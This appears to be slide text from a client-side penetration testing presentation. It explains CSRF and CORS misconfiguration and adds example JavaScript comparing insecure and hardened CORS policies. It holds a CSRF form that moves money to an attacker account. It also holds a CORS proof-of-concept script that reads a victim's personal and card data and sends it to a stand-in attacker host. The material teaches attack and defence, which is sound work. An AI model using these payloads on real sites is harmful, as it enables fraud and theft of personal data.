2. Client-Side Penetration Testing Presentation
CSRF
CSRF EXPLOITATION
CORS Misconfiguration Misconceptions
CORS Misconfiguration Misconceptions exploitation
3. Pentesters need to find a way to make the victims open the door for them to
get into the network, or force the victim to execute scripts and actions
against their will, or read some of their personal details. Client-side attacks
require user interaction, such as enticing the victim to click a link, open a
document, or somehow reach your malicious or infected website. That's why
companies are very careful about this kind of attack.
Client-Side Penetration Testing Presentation
4. With a little help of social engineering (such as sending a link via
email or chat), an attacker may trick the users of a web application
into executing actions of the attacker's choosing. If the victim is a
normal user, a successful CSRF attack can force the user to
perform state changing requests like transferring funds, changing
their email address, and so forth. If the victim is an administrative
account, CSRF can compromise the entire web application.
CSRF
5. Let's suppose the attacker has found a CSRF vulnerability that allows him to force the
victim to send him money on https://poker-example-website.com. So with a simple click by
the victim on (View my pictures) in website-attacker.com/csrf.html, the money can be sent
to the attacker.
Example HTML SOURCE :
<form action="https://poker-example-website.com/transfer.do" method="POST">
<input type="hidden" name="acct" value="ATTACKER_ACCT"/>
<input type="hidden" name="amount" value="1000"/>
<input type="submit" value="View my pictures"/>
</form>
CSRF EXPLOITATION
6. For example, the attacker can read arbitrary data from the accounts
of other users.
CORS Misconfiguration Misconceptions :
7. If the attacker finds a CORS misconfiguration in https://poker-example-website.com,
he can read the victim's personal details. Example:
Name
Date of birth
Address
Credit card number
Card expiration date
CVV
If the victim visits poker-example-website.com/cors.html, the attacker will receive all
the personal details in logs.txt, sent by the request
log?key='+this.responseText
CORS Misconfiguration Misconceptions :
8. Example HTML source :
<!DOCTYPE html>
<html>
<body>
<center>
<h1> CORS POC EXPLOIT </h1>
<script>
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','http://api.poker-example-website.com/view.php?action=details',true);
req.withCredentials = true;
req.send();
function reqListener() {
  location='//website-attacker.com/log?key='+this.responseText;
}
</script>
</center>
</body>
</html>
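The PoC above only works when the API answers a credentialed cross-origin request with Access-Control-Allow-Origin set to the attacker's origin and Access-Control-Allow-Credentials: true. The following is an added example (not from the slides) of the server-side CORS logic behind an endpoint like view.php?action=details, written three ways: reflecting the Origin header, "validating" it with a suffix match, and an exact-match allowlist. The allowlist entries and probe origins are constructed values; the last function mirrors the browser rule for when a credentialed response is readable.

```javascript
// Added example: CORS policy functions for an authenticated API endpoint.
// Each takes the request's Origin header and returns the response headers
// to send. Not part of the original slides.

// Origins allowed to read authenticated responses (assumed values).
const ALLOWED_ORIGINS = new Set([
  'https://poker-example-website.com',
  'https://app.poker-example-website.com',
]);

// Misconfiguration 1: reflect whatever Origin arrives, with credentials.
// Any page the victim visits can then read the response with cookies attached.
function corsHeadersReflecting(origin) {
  return {
    'Access-Control-Allow-Origin': origin,
    'Access-Control-Allow-Credentials': 'true',
  };
}

// Misconfiguration 2: a suffix match that looks like validation.
// 'https://evilpoker-example-website.com' ends with the trusted name, and the
// literal 'null' origin (sandboxed iframes, local files) is often allowed too.
function corsHeadersSuffixMatch(origin) {
  if (origin === 'null' || origin.endsWith('poker-example-website.com')) {
    return corsHeadersReflecting(origin);
  }
  return {};
}

// Hardened: exact match, scheme included, against an explicit allowlist,
// plus Vary: Origin so a shared cache never serves one origin's headers
// to another origin's request.
function corsHeadersHardened(origin) {
  if (typeof origin !== 'string' || !ALLOWED_ORIGINS.has(origin)) {
    return { 'Vary': 'Origin' }; // no CORS headers: the browser blocks the read
  }
  return {
    'Access-Control-Allow-Origin': origin,
    'Access-Control-Allow-Credentials': 'true',
    'Vary': 'Origin',
  };
}

// Would a script running on `origin` be allowed to read a credentialed
// response carrying these headers? Browsers require ACAO to equal the origin
// exactly ('*' is rejected with credentials) and ACAC to be 'true'.
function crossOriginReadAllowed(origin, headers) {
  return headers['Access-Control-Allow-Origin'] === origin &&
    headers['Access-Control-Allow-Credentials'] === 'true';
}

// Probe a policy with constructed origins: the slide's attacker site, a
// look-alike domain, the null origin, and the real application.
function evaluate(policy) {
  const probes = [
    'https://website-attacker.com',
    'https://evilpoker-example-website.com',
    'null',
    'https://poker-example-website.com',
  ];
  const result = {};
  for (const o of probes) result[o] = crossOriginReadAllowed(o, policy(o));
  return result;
}
```

Detection-wise, the same evaluate() loop is what a scanner does: send the request with a foreign Origin header and see whether it is echoed back together with Allow-Credentials; any policy that lets website-attacker.com or the look-alike domain through is the finding described on the slides.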